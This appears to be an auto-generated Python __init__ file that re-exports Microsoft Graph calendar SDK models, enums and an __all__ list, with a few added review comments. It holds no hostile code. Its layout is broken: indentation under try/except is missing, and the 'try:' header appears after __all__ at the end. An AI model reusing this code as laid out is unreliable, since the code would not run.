from ._models_py3 import MicrosoftGraphMultiValueLegacyExtendedProperty
from ._models_py3 import MicrosoftGraphOnlineMeetingInfo
from ._models_py3 import MicrosoftGraphOutlookGeoCoordinates
from ._models_py3 import MicrosoftGraphOutlookItem
from ._models_py3 import MicrosoftGraphPatternedRecurrence
from ._models_py3 import MicrosoftGraphPhone
from ._models_py3 import MicrosoftGraphPhysicalAddress
from ._models_py3 import MicrosoftGraphPlace
from ._models_py3 import MicrosoftGraphRecipient
from ._models_py3 import MicrosoftGraphRecurrencePattern
from ._models_py3 import MicrosoftGraphRecurrenceRange
from ._models_py3 import MicrosoftGraphResponseStatus
from ._models_py3 import MicrosoftGraphSingleValueLegacyExtendedProperty
from ._models_py3 import MicrosoftGraphTimeSlot
from ._models_py3 import OdataError
from ._models_py3 import OdataErrorDetail
from ._models_py3 import OdataErrorMain
except (SyntaxError, ImportError):
from ._models import CollectionOfAttachment # type: ignore
from ._models import CollectionOfAttachment0 # type: ignore
from ._models import CollectionOfAttachment1 # type: ignore
from ._models import CollectionOfAttachment10 # type: ignore
from ._models import CollectionOfAttachment2 # type: ignore
from ._models import CollectionOfAttachment3 # type: ignore
from ._models import CollectionOfAttachment4 # type: ignore
from ._models import CollectionOfAttachment5 # type: ignore
from ._models import CollectionOfAttachment6 # type: ignore
from ._models import CollectionOfAttachment7 # type: ignore
from ._models import CollectionOfAttachment8 # type: ignore
from ._models import CollectionOfAttachment9 # type: ignore
from ._models import CollectionOfCalendar # type: ignore
from ._models import CollectionOfCalendar0 # type: ignore
from ._models import CollectionOfCalendarGroup # type: ignore
from ._models import CollectionOfCalendarPermission # type: ignore
from ._models import CollectionOfCalendarPermission0 # type: ignore
from ._models import CollectionOfCalendarPermission1 # type: ignore
from ._models import CollectionOfCalendarPermission2 # type: ignore
from ._models import CollectionOfCalendarPermission3 # type: ignore
from ._models import CollectionOfCalendarPermission4 # type: ignore
from ._models import CollectionOfCalendarPermission5 # type: ignore
from ._models import CollectionOfCalendarPermission6 # type: ignore
from ._models import CollectionOfEvent # type: ignore
from ._models import CollectionOfEvent0 # type: ignore
from ._models import CollectionOfEvent1 # type: ignore
from ._models import CollectionOfEvent10 # type: ignore
from ._models import CollectionOfEvent11 # type: ignore
from ._models import CollectionOfEvent12 # type: ignore
from ._models import CollectionOfEvent13 # type: ignore
from ._models import CollectionOfEvent14 # type: ignore
from ._models import CollectionOfEvent15 # type: ignore
from ._models import CollectionOfEvent16 # type: ignore
from ._models import CollectionOfEvent17 # type: ignore
from ._models import CollectionOfEvent18 # type: ignore
from ._models import CollectionOfEvent19 # type: ignore
from ._models import CollectionOfEvent2 # type: ignore
from ._models import CollectionOfEvent20 # type: ignore
from ._models import CollectionOfEvent21 # type: ignore
from ._models import CollectionOfEvent22 # type: ignore
from ._models import CollectionOfEvent23 # type: ignore
from ._models import CollectionOfEvent24 # type: ignore
from ._models import CollectionOfEvent25 # type: ignore
from ._models import CollectionOfEvent26 # type: ignore
from ._models import CollectionOfEvent27 # type: ignore
from ._models import CollectionOfEvent28 # type: ignore
from ._models import CollectionOfEvent29 # type: ignore
from ._models import CollectionOfEvent3 # type: ignore
from ._models import CollectionOfEvent30 # type: ignore
from ._models import CollectionOfEvent31 # type: ignore
from ._models import CollectionOfEvent32 # type: ignore
from ._models import CollectionOfEvent33 # type: ignore
from ._models import CollectionOfEvent34 # type: ignore
from ._models import CollectionOfEvent35 # type: ignore
from ._models import CollectionOfEvent36 # type: ignore
from ._models import CollectionOfEvent37 # type: ignore
from ._models import CollectionOfEvent38 # type: ignore
from ._models import CollectionOfEvent39 # type: ignore
from ._models import CollectionOfEvent4 # type: ignore
from ._models import CollectionOfEvent40 # type: ignore
from ._models import CollectionOfEvent41 # type: ignore
from ._models import CollectionOfEvent42 # type: ignore
from ._models import CollectionOfEvent5 # type: ignore
from ._models import CollectionOfEvent6 # type: ignore
from ._models import CollectionOfEvent7 # type: ignore
from ._models import CollectionOfEvent8 # type: ignore
from ._models import CollectionOfEvent9 # type: ignore
from ._models import CollectionOfExtension # type: ignore
from ._models import CollectionOfExtension0 # type: ignore
from ._models import CollectionOfExtension1 # type: ignore
from ._models import CollectionOfExtension10 # type: ignore
from ._models import CollectionOfExtension2 # type: ignore
from ._models import CollectionOfExtension3 # type: ignore
from ._models import CollectionOfExtension4 # type: ignore
from ._models import CollectionOfExtension5 # type: ignore
from ._models import CollectionOfExtension6 # type: ignore
from ._models import CollectionOfExtension7 # type: ignore
from ._models import CollectionOfExtension8 # type: ignore
from ._models import CollectionOfExtension9 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty0 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty1 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty10 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty11 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty12 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty13 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty14 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty15 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty16 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty17 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty18 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty2 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty3 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty4 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty5 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty6 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty7 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty8 # type: ignore
from ._models import CollectionOfMultiValueLegacyExtendedProperty9 # type: ignore
from ._models import CollectionOfPlace # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty0 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty1 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty10 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty11 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty12 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty13 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty14 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty15 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty16 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty17 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty18 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty2 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty3 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty4 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty5 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty6 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty7 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty8 # type: ignore
from ._models import CollectionOfSingleValueLegacyExtendedProperty9 # type: ignore
from ._models import MicrosoftGraphAttachment # type: ignore
from ._models import MicrosoftGraphAttendee # type: ignore
from ._models import MicrosoftGraphAttendeeBase # type: ignore
from ._models import MicrosoftGraphCalendar # type: ignore
from ._models import MicrosoftGraphCalendarGroup # type: ignore
from ._models import MicrosoftGraphCalendarPermission # type: ignore
from ._models import MicrosoftGraphDateTimeZone # type: ignore
from ._models import MicrosoftGraphEmailAddress # type: ignore
from ._models import MicrosoftGraphEntity # type: ignore
from ._models import MicrosoftGraphEvent # type: ignore
from ._models import MicrosoftGraphExtension # type: ignore
from ._models import MicrosoftGraphItemBody # type: ignore
from ._models import MicrosoftGraphLocation # type: ignore
from ._models import MicrosoftGraphMultiValueLegacyExtendedProperty # type: ignore
from ._models import MicrosoftGraphOnlineMeetingInfo # type: ignore
from ._models import MicrosoftGraphOutlookGeoCoordinates # type: ignore
from ._models import MicrosoftGraphOutlookItem # type: ignore
from ._models import MicrosoftGraphPatternedRecurrence # type: ignore
from ._models import MicrosoftGraphPhone # type: ignore
from ._models import MicrosoftGraphPhysicalAddress # type: ignore
from ._models import MicrosoftGraphPlace # type: ignore
from ._models import MicrosoftGraphRecipient # type: ignore
from ._models import MicrosoftGraphRecurrencePattern # type: ignore
from ._models import MicrosoftGraphRecurrenceRange # type: ignore
from ._models import MicrosoftGraphResponseStatus # type: ignore
from ._models import MicrosoftGraphSingleValueLegacyExtendedProperty # type: ignore
from ._models import MicrosoftGraphTimeSlot # type: ignore
from ._models import OdataError # type: ignore
from ._models import OdataErrorDetail # type: ignore
from ._models import OdataErrorMain # type: ignore
from ._calendar_enums import (
Enum100,
Enum101,
Enum102,
Enum103,
Enum104,
Enum105,
Enum106,
Enum107,
Enum108,
Enum109,
Enum110,
Enum111,
Enum112,
Enum113,
Enum114,
Enum115,
Enum116,
Enum117,
Enum118,
Enum119,
Enum120,
Enum121,
Enum122,
Enum123,
Enum124,
Enum125,
Enum126,
Enum127,
Enum128,
Enum129,
Enum130,
Enum131,
Enum132,
Enum133,
Enum134,
Enum135,
Enum136,
Enum137,
Enum138,
Enum139,
Enum140,
Enum141,
Enum142,
Enum143,
Enum144,
Enum145,
Enum146,
Enum147,
Enum148,
Enum149,
Enum150,
Enum151,
Enum152,
Enum153,
Enum154,
Enum155,
Enum156,
Enum157,
Enum158,
Enum159,
Enum160,
Enum161,
Enum162,
Enum163,
Enum164,
Enum165,
Enum166,
Enum167,
Enum168,
Enum169,
Enum170,
Enum171,
Enum172,
Enum173,
Enum174,
Enum175,
Enum176,
Enum177,
Enum178,
Enum179,
Enum180,
Enum181,
Enum182,
Enum183,
Enum184,
Enum185,
Enum186,
Enum187,
Enum188,
Enum189,
Enum190,
Enum191,
Enum192,
Enum193,
Enum194,
Enum195,
Enum196,
Enum197,
Enum198,
Enum199,
Enum200,
Enum201,
Enum202,
Enum203,
Enum204,
Enum205,
Enum206,
Enum207,
Enum208,
Enum209,
Enum210,
Enum211,
Enum212,
Enum213,
Enum214,
Enum215,
Enum216,
Enum217,
Enum218,
Enum219,
Enum22,
Enum220,
Enum221,
Enum222,
Enum223,
Enum224,
Enum225,
Enum226,
Enum227,
Enum228,
Enum229,
Enum23,
Enum230,
Enum231,
Enum232,
Enum233,
Enum234,
Enum235,
Enum236,
Enum237,
Enum238,
Enum239,
Enum240,
Enum241,
Enum242,
Enum243,
Enum244,
Enum245,
Enum246,
Enum247,
Enum248,
Enum249,
Enum250,
Enum251,
Enum252,
Enum253,
Enum254,
Enum255,
Enum256,
Enum257,
Enum258,
Enum259,
Enum260,
Enum261,
Enum262,
Enum263,
Enum264,
Enum265,
Enum266,
Enum267,
Enum268,
Enum269,
Enum270,
Enum271,
Enum272,
Enum273,
Enum274,
Enum275,
Enum276,
Enum277,
Enum278,
Enum279,
Enum28,
Enum280,
Enum281,
Enum282,
Enum283,
Enum284,
Enum285,
Enum286,
Enum287,
Enum288,
Enum289,
Enum29,
Enum290,
Enum291,
Enum292,
Enum293,
Enum294,
Enum295,
Enum296,
Enum297,
Enum298,
Enum299,
Enum30,
Enum300,
Enum301,
Enum302,
Enum303,
Enum304,
Enum305,
Enum306,
Enum307,
Enum308,
Enum309,
Enum31,
Enum310,
Enum311,
Enum312,
Enum313,
Enum314,
Enum315,
Enum316,
Enum317,
Enum318,
Enum319,
Enum32,
Enum320,
Enum321,
Enum322,
Enum323,
Enum324,
Enum325,
Enum326,
Enum327,
Enum328,
Enum329,
Enum33,
Enum330,
Enum331,
Enum332,
Enum333,
Enum334,
Enum335,
Enum336,
Enum337,
Enum338,
Enum339,
Enum34,
Enum340,
Enum341,
Enum342,
Enum343,
Enum344,
Enum345,
Enum346,
Enum347,
Enum348,
Enum349,
Enum35,
Enum350,
Enum351,
Enum352,
Enum353,
Enum354,
Enum355,
Enum356,
Enum357,
Enum358,
Enum359,
Enum36,
Enum360,
Enum361,
Enum362,
Enum363,
Enum364,
Enum365,
Enum366,
Enum367,
Enum368,
Enum369,
Enum37,
Enum370,
Enum371,
Enum372,
Enum373,
Enum374,
Enum375,
Enum376,
Enum377,
Enum378,
Enum379,
Enum38,
Enum380,
Enum381,
Enum382,
Enum383,
Enum384,
Enum385,
Enum386,
Enum387,
Enum388,
Enum389,
Enum39,
Enum390,
Enum391,
Enum392,
Enum393,
Enum394,
Enum395,
Enum396,
Enum397,
Enum398,
Enum399,
Enum40,
Enum400,
Enum401,
Enum402,
Enum403,
Enum404,
Enum405,
Enum406,
Enum407,
Enum408,
Enum409,
Enum41,
Enum410,
Enum411,
Enum412,
Enum413,
Enum414,
Enum415,
Enum416,
Enum417,
Enum418,
Enum419,
Enum42,
Enum420,
Enum421,
Enum422,
Enum423,
Enum424,
Enum425,
Enum426,
Enum427,
Enum428,
Enum429,
Enum43,
Enum430,
Enum431,
Enum432,
Enum433,
Enum434,
Enum435,
Enum436,
Enum437,
Enum438,
Enum439,
Enum44,
Enum440,
Enum441,
Enum442,
Enum443,
Enum444,
Enum445,
Enum446,
Enum447,
Enum448,
Enum449,
Enum45,
Enum450,
Enum451,
Enum452,
Enum453,
Enum454,
Enum455,
Enum456,
Enum457,
Enum458,
Enum459,
Enum46,
Enum460,
Enum461,
Enum462,
Enum463,
Enum464,
Enum465,
Enum466,
Enum467,
Enum468,
Enum469,
Enum47,
Enum470,
Enum471,
Enum472,
Enum473,
Enum474,
Enum475,
Enum48,
Enum49,
Enum50,
Enum51,
Enum52,
Enum53,
Enum54,
Enum55,
Enum56,
Enum57,
Enum58,
Enum59,
Enum60,
Enum61,
Enum62,
Enum63,
Enum64,
Enum65,
Enum66,
Enum67,
Enum68,
Enum69,
Enum70,
Enum71,
Enum72,
Enum73,
Enum74,
Enum75,
Enum76,
Enum77,
Enum78,
Enum79,
Enum80,
Enum81,
Enum82,
Enum83,
Enum84,
Enum85,
Enum86,
Enum87,
Enum88,
Enum89,
Enum90,
Enum91,
Enum92,
Enum93,
Enum94,
Enum95,
Enum96,
Enum97,
Enum98,
Enum99,
Get10ItemsItem,
Get1ItemsItem,
Get2ItemsItem,
Get4ItemsItem,
Get5ItemsItem,
Get6ItemsItem,
Get7ItemsItem,
Get9ItemsItem,
MicrosoftGraphAttendeeType,
MicrosoftGraphBodyType,
MicrosoftGraphCalendarColor,
MicrosoftGraphCalendarRoleType,
MicrosoftGraphDayOfWeek,
MicrosoftGraphEventType,
MicrosoftGraphFreeBusyStatus,
MicrosoftGraphImportance,
MicrosoftGraphLocationType,
MicrosoftGraphLocationUniqueIdType,
MicrosoftGraphOnlineMeetingProviderType,
MicrosoftGraphPhoneType,
MicrosoftGraphPhysicalAddressType,
MicrosoftGraphRecurrencePatternType,
MicrosoftGraphRecurrenceRangeType,
MicrosoftGraphResponseType,
MicrosoftGraphSensitivity,
MicrosoftGraphWeekIndex,
)
# Public API surface of this models sub-package, re-exported via the
# py2/py3 conditional imports above.
# NOTE(review): this file looks auto-generated (AutoRest / Azure SDK code
# generation for Microsoft Graph calendar models) — prefer regenerating
# over hand-editing; keep this list in sync with the import statements.
__all__ = [
    # Paged-collection response wrappers (numeric suffixes are generator-assigned).
    'CollectionOfAttachment',
    'CollectionOfAttachment0',
    'CollectionOfAttachment1',
    'CollectionOfAttachment10',
    'CollectionOfAttachment2',
    'CollectionOfAttachment3',
    'CollectionOfAttachment4',
    'CollectionOfAttachment5',
    'CollectionOfAttachment6',
    'CollectionOfAttachment7',
    'CollectionOfAttachment8',
    'CollectionOfAttachment9',
    'CollectionOfCalendar',
    'CollectionOfCalendar0',
    'CollectionOfCalendarGroup',
    'CollectionOfCalendarPermission',
    'CollectionOfCalendarPermission0',
    'CollectionOfCalendarPermission1',
    'CollectionOfCalendarPermission2',
    'CollectionOfCalendarPermission3',
    'CollectionOfCalendarPermission4',
    'CollectionOfCalendarPermission5',
    'CollectionOfCalendarPermission6',
    'CollectionOfEvent',
    'CollectionOfEvent0',
    'CollectionOfEvent1',
    'CollectionOfEvent10',
    'CollectionOfEvent11',
    'CollectionOfEvent12',
    'CollectionOfEvent13',
    'CollectionOfEvent14',
    'CollectionOfEvent15',
    'CollectionOfEvent16',
    'CollectionOfEvent17',
    'CollectionOfEvent18',
    'CollectionOfEvent19',
    'CollectionOfEvent2',
    'CollectionOfEvent20',
    'CollectionOfEvent21',
    'CollectionOfEvent22',
    'CollectionOfEvent23',
    'CollectionOfEvent24',
    'CollectionOfEvent25',
    'CollectionOfEvent26',
    'CollectionOfEvent27',
    'CollectionOfEvent28',
    'CollectionOfEvent29',
    'CollectionOfEvent3',
    'CollectionOfEvent30',
    'CollectionOfEvent31',
    'CollectionOfEvent32',
    'CollectionOfEvent33',
    'CollectionOfEvent34',
    'CollectionOfEvent35',
    'CollectionOfEvent36',
    'CollectionOfEvent37',
    'CollectionOfEvent38',
    'CollectionOfEvent39',
    'CollectionOfEvent4',
    'CollectionOfEvent40',
    'CollectionOfEvent41',
    'CollectionOfEvent42',
    'CollectionOfEvent5',
    'CollectionOfEvent6',
    'CollectionOfEvent7',
    'CollectionOfEvent8',
    'CollectionOfEvent9',
    'CollectionOfExtension',
    'CollectionOfExtension0',
    'CollectionOfExtension1',
    'CollectionOfExtension10',
    'CollectionOfExtension2',
    'CollectionOfExtension3',
    'CollectionOfExtension4',
    'CollectionOfExtension5',
    'CollectionOfExtension6',
    'CollectionOfExtension7',
    'CollectionOfExtension8',
    'CollectionOfExtension9',
    'CollectionOfMultiValueLegacyExtendedProperty',
    'CollectionOfMultiValueLegacyExtendedProperty0',
    'CollectionOfMultiValueLegacyExtendedProperty1',
    'CollectionOfMultiValueLegacyExtendedProperty10',
    'CollectionOfMultiValueLegacyExtendedProperty11',
    'CollectionOfMultiValueLegacyExtendedProperty12',
    'CollectionOfMultiValueLegacyExtendedProperty13',
    'CollectionOfMultiValueLegacyExtendedProperty14',
    'CollectionOfMultiValueLegacyExtendedProperty15',
    'CollectionOfMultiValueLegacyExtendedProperty16',
    'CollectionOfMultiValueLegacyExtendedProperty17',
    'CollectionOfMultiValueLegacyExtendedProperty18',
    'CollectionOfMultiValueLegacyExtendedProperty2',
    'CollectionOfMultiValueLegacyExtendedProperty3',
    'CollectionOfMultiValueLegacyExtendedProperty4',
    'CollectionOfMultiValueLegacyExtendedProperty5',
    'CollectionOfMultiValueLegacyExtendedProperty6',
    'CollectionOfMultiValueLegacyExtendedProperty7',
    'CollectionOfMultiValueLegacyExtendedProperty8',
    'CollectionOfMultiValueLegacyExtendedProperty9',
    'CollectionOfPlace',
    'CollectionOfSingleValueLegacyExtendedProperty',
    'CollectionOfSingleValueLegacyExtendedProperty0',
    'CollectionOfSingleValueLegacyExtendedProperty1',
    'CollectionOfSingleValueLegacyExtendedProperty10',
    'CollectionOfSingleValueLegacyExtendedProperty11',
    'CollectionOfSingleValueLegacyExtendedProperty12',
    'CollectionOfSingleValueLegacyExtendedProperty13',
    'CollectionOfSingleValueLegacyExtendedProperty14',
    'CollectionOfSingleValueLegacyExtendedProperty15',
    'CollectionOfSingleValueLegacyExtendedProperty16',
    'CollectionOfSingleValueLegacyExtendedProperty17',
    'CollectionOfSingleValueLegacyExtendedProperty18',
    'CollectionOfSingleValueLegacyExtendedProperty2',
    'CollectionOfSingleValueLegacyExtendedProperty3',
    'CollectionOfSingleValueLegacyExtendedProperty4',
    'CollectionOfSingleValueLegacyExtendedProperty5',
    'CollectionOfSingleValueLegacyExtendedProperty6',
    'CollectionOfSingleValueLegacyExtendedProperty7',
    'CollectionOfSingleValueLegacyExtendedProperty8',
    'CollectionOfSingleValueLegacyExtendedProperty9',
    # Entity / complex-type models.
    'MicrosoftGraphAttachment',
    'MicrosoftGraphAttendee',
    'MicrosoftGraphAttendeeBase',
    'MicrosoftGraphCalendar',
    'MicrosoftGraphCalendarGroup',
    'MicrosoftGraphCalendarPermission',
    'MicrosoftGraphDateTimeZone',
    'MicrosoftGraphEmailAddress',
    'MicrosoftGraphEntity',
    'MicrosoftGraphEvent',
    'MicrosoftGraphExtension',
    'MicrosoftGraphItemBody',
    'MicrosoftGraphLocation',
    'MicrosoftGraphMultiValueLegacyExtendedProperty',
    'MicrosoftGraphOnlineMeetingInfo',
    'MicrosoftGraphOutlookGeoCoordinates',
    'MicrosoftGraphOutlookItem',
    'MicrosoftGraphPatternedRecurrence',
    'MicrosoftGraphPhone',
    'MicrosoftGraphPhysicalAddress',
    'MicrosoftGraphPlace',
    'MicrosoftGraphRecipient',
    'MicrosoftGraphRecurrencePattern',
    'MicrosoftGraphRecurrenceRange',
    'MicrosoftGraphResponseStatus',
    'MicrosoftGraphSingleValueLegacyExtendedProperty',
    'MicrosoftGraphTimeSlot',
    'OdataError',
    'OdataErrorDetail',
    'OdataErrorMain',
    # Generated enums (ordered lexicographically, hence e.g. Enum22 between
    # Enum219 and Enum220).
    'Enum100',
    'Enum101',
    'Enum102',
    'Enum103',
    'Enum104',
    'Enum105',
    'Enum106',
    'Enum107',
    'Enum108',
    'Enum109',
    'Enum110',
    'Enum111',
    'Enum112',
    'Enum113',
    'Enum114',
    'Enum115',
    'Enum116',
    'Enum117',
    'Enum118',
    'Enum119',
    'Enum120',
    'Enum121',
    'Enum122',
    'Enum123',
    'Enum124',
    'Enum125',
    'Enum126',
    'Enum127',
    'Enum128',
    'Enum129',
    'Enum130',
    'Enum131',
    'Enum132',
    'Enum133',
    'Enum134',
    'Enum135',
    'Enum136',
    'Enum137',
    'Enum138',
    'Enum139',
    'Enum140',
    'Enum141',
    'Enum142',
    'Enum143',
    'Enum144',
    'Enum145',
    'Enum146',
    'Enum147',
    'Enum148',
    'Enum149',
    'Enum150',
    'Enum151',
    'Enum152',
    'Enum153',
    'Enum154',
    'Enum155',
    'Enum156',
    'Enum157',
    'Enum158',
    'Enum159',
    'Enum160',
    'Enum161',
    'Enum162',
    'Enum163',
    'Enum164',
    'Enum165',
    'Enum166',
    'Enum167',
    'Enum168',
    'Enum169',
    'Enum170',
    'Enum171',
    'Enum172',
    'Enum173',
    'Enum174',
    'Enum175',
    'Enum176',
    'Enum177',
    'Enum178',
    'Enum179',
    'Enum180',
    'Enum181',
    'Enum182',
    'Enum183',
    'Enum184',
    'Enum185',
    'Enum186',
    'Enum187',
    'Enum188',
    'Enum189',
    'Enum190',
    'Enum191',
    'Enum192',
    'Enum193',
    'Enum194',
    'Enum195',
    'Enum196',
    'Enum197',
    'Enum198',
    'Enum199',
    'Enum200',
    'Enum201',
    'Enum202',
    'Enum203',
    'Enum204',
    'Enum205',
    'Enum206',
    'Enum207',
    'Enum208',
    'Enum209',
    'Enum210',
    'Enum211',
    'Enum212',
    'Enum213',
    'Enum214',
    'Enum215',
    'Enum216',
    'Enum217',
    'Enum218',
    'Enum219',
    'Enum22',
    'Enum220',
    'Enum221',
    'Enum222',
    'Enum223',
    'Enum224',
    'Enum225',
    'Enum226',
    'Enum227',
    'Enum228',
    'Enum229',
    'Enum23',
    'Enum230',
    'Enum231',
    'Enum232',
    'Enum233',
    'Enum234',
    'Enum235',
    'Enum236',
    'Enum237',
    'Enum238',
    'Enum239',
    'Enum240',
    'Enum241',
    'Enum242',
    'Enum243',
    'Enum244',
    'Enum245',
    'Enum246',
    'Enum247',
    'Enum248',
    'Enum249',
    'Enum250',
    'Enum251',
    'Enum252',
    'Enum253',
    'Enum254',
    'Enum255',
    'Enum256',
    'Enum257',
    'Enum258',
    'Enum259',
    'Enum260',
    'Enum261',
    'Enum262',
    'Enum263',
    'Enum264',
    'Enum265',
    'Enum266',
    'Enum267',
    'Enum268',
    'Enum269',
    'Enum270',
    'Enum271',
    'Enum272',
    'Enum273',
    'Enum274',
    'Enum275',
    'Enum276',
    'Enum277',
    'Enum278',
    'Enum279',
    'Enum28',
    'Enum280',
    'Enum281',
    'Enum282',
    'Enum283',
    'Enum284',
    'Enum285',
    'Enum286',
    'Enum287',
    'Enum288',
    'Enum289',
    'Enum29',
    'Enum290',
    'Enum291',
    'Enum292',
    'Enum293',
    'Enum294',
    'Enum295',
    'Enum296',
    'Enum297',
    'Enum298',
    'Enum299',
    'Enum30',
    'Enum300',
    'Enum301',
    'Enum302',
    'Enum303',
    'Enum304',
    'Enum305',
    'Enum306',
    'Enum307',
    'Enum308',
    'Enum309',
    'Enum31',
    'Enum310',
    'Enum311',
    'Enum312',
    'Enum313',
    'Enum314',
    'Enum315',
    'Enum316',
    'Enum317',
    'Enum318',
    'Enum319',
    'Enum32',
    'Enum320',
    'Enum321',
    'Enum322',
    'Enum323',
    'Enum324',
    'Enum325',
    'Enum326',
    'Enum327',
    'Enum328',
    'Enum329',
    'Enum33',
    'Enum330',
    'Enum331',
    'Enum332',
    'Enum333',
    'Enum334',
    'Enum335',
    'Enum336',
    'Enum337',
    'Enum338',
    'Enum339',
    'Enum34',
    'Enum340',
    'Enum341',
    'Enum342',
    'Enum343',
    'Enum344',
    'Enum345',
    'Enum346',
    'Enum347',
    'Enum348',
    'Enum349',
    'Enum35',
    'Enum350',
    'Enum351',
    'Enum352',
    'Enum353',
    'Enum354',
    'Enum355',
    'Enum356',
    'Enum357',
    'Enum358',
    'Enum359',
    'Enum36',
    'Enum360',
    'Enum361',
    'Enum362',
    'Enum363',
    'Enum364',
    'Enum365',
    'Enum366',
    'Enum367',
    'Enum368',
    'Enum369',
    'Enum37',
    'Enum370',
    'Enum371',
    'Enum372',
    'Enum373',
    'Enum374',
    'Enum375',
    'Enum376',
    'Enum377',
    'Enum378',
    'Enum379',
    'Enum38',
    'Enum380',
    'Enum381',
    'Enum382',
    'Enum383',
    'Enum384',
    'Enum385',
    'Enum386',
    'Enum387',
    'Enum388',
    'Enum389',
    'Enum39',
    'Enum390',
    'Enum391',
    'Enum392',
    'Enum393',
    'Enum394',
    'Enum395',
    'Enum396',
    'Enum397',
    'Enum398',
    'Enum399',
    'Enum40',
    'Enum400',
    'Enum401',
    'Enum402',
    'Enum403',
    'Enum404',
    'Enum405',
    'Enum406',
    'Enum407',
    'Enum408',
    'Enum409',
    'Enum41',
    'Enum410',
    'Enum411',
    'Enum412',
    'Enum413',
    'Enum414',
    'Enum415',
    'Enum416',
    'Enum417',
    'Enum418',
    'Enum419',
    'Enum42',
    'Enum420',
    'Enum421',
    'Enum422',
    'Enum423',
    'Enum424',
    'Enum425',
    'Enum426',
    'Enum427',
    'Enum428',
    'Enum429',
    'Enum43',
    'Enum430',
    'Enum431',
    'Enum432',
    'Enum433',
    'Enum434',
    'Enum435',
    'Enum436',
    'Enum437',
    'Enum438',
    'Enum439',
    'Enum44',
    'Enum440',
    'Enum441',
    'Enum442',
    'Enum443',
    'Enum444',
    'Enum445',
    'Enum446',
    'Enum447',
    'Enum448',
    'Enum449',
    'Enum45',
    'Enum450',
    'Enum451',
    'Enum452',
    'Enum453',
    'Enum454',
    'Enum455',
    'Enum456',
    'Enum457',
    'Enum458',
    'Enum459',
    'Enum46',
    'Enum460',
    'Enum461',
    'Enum462',
    'Enum463',
    'Enum464',
    'Enum465',
    'Enum466',
    'Enum467',
    'Enum468',
    'Enum469',
    'Enum47',
    'Enum470',
    'Enum471',
    'Enum472',
    'Enum473',
    'Enum474',
    'Enum475',
    'Enum48',
    'Enum49',
    'Enum50',
    'Enum51',
    'Enum52',
    'Enum53',
    'Enum54',
    'Enum55',
    'Enum56',
    'Enum57',
    'Enum58',
    'Enum59',
    'Enum60',
    'Enum61',
    'Enum62',
    'Enum63',
    'Enum64',
    'Enum65',
    'Enum66',
    'Enum67',
    'Enum68',
    'Enum69',
    'Enum70',
    'Enum71',
    'Enum72',
    'Enum73',
    'Enum74',
    'Enum75',
    'Enum76',
    'Enum77',
    'Enum78',
    'Enum79',
    'Enum80',
    'Enum81',
    'Enum82',
    'Enum83',
    'Enum84',
    'Enum85',
    'Enum86',
    'Enum87',
    'Enum88',
    'Enum89',
    'Enum90',
    'Enum91',
    'Enum92',
    'Enum93',
    'Enum94',
    'Enum95',
    'Enum96',
    'Enum97',
    'Enum98',
    'Enum99',
    # Per-operation query-parameter item enums.
    'Get10ItemsItem',
    'Get1ItemsItem',
    'Get2ItemsItem',
    'Get4ItemsItem',
    'Get5ItemsItem',
    'Get6ItemsItem',
    'Get7ItemsItem',
    'Get9ItemsItem',
    # Named (human-readable) Microsoft Graph enums.
    'MicrosoftGraphAttendeeType',
    'MicrosoftGraphBodyType',
    'MicrosoftGraphCalendarColor',
    'MicrosoftGraphCalendarRoleType',
    'MicrosoftGraphDayOfWeek',
    'MicrosoftGraphEventType',
    'MicrosoftGraphFreeBusyStatus',
    'MicrosoftGraphImportance',
    'MicrosoftGraphLocationType',
    'MicrosoftGraphLocationUniqueIdType',
    'MicrosoftGraphOnlineMeetingProviderType',
    'MicrosoftGraphPhoneType',
    'MicrosoftGraphPhysicalAddressType',
    'MicrosoftGraphRecurrencePatternType',
    'MicrosoftGraphRecurrenceRangeType',
    'MicrosoftGraphResponseType',
    'MicrosoftGraphSensitivity',
    'MicrosoftGraphWeekIndex',
]
# NOTE(review): the line "| 27.820296 | 94 | 0.703321 |" here was dataset-extraction residue (table-column values), not part of the source file; neutralized as a comment.
try:
from ._models_py3 import CollectionOfAttachment
from ._models_py3 import CollectionOfAttachment0
from ._models_py3 import CollectionOfAttachment1
from ._models_py3 import CollectionOfAttachment10
from ._models_py3 import CollectionOfAttachment2
from ._models_py3 import CollectionOfAttachment3
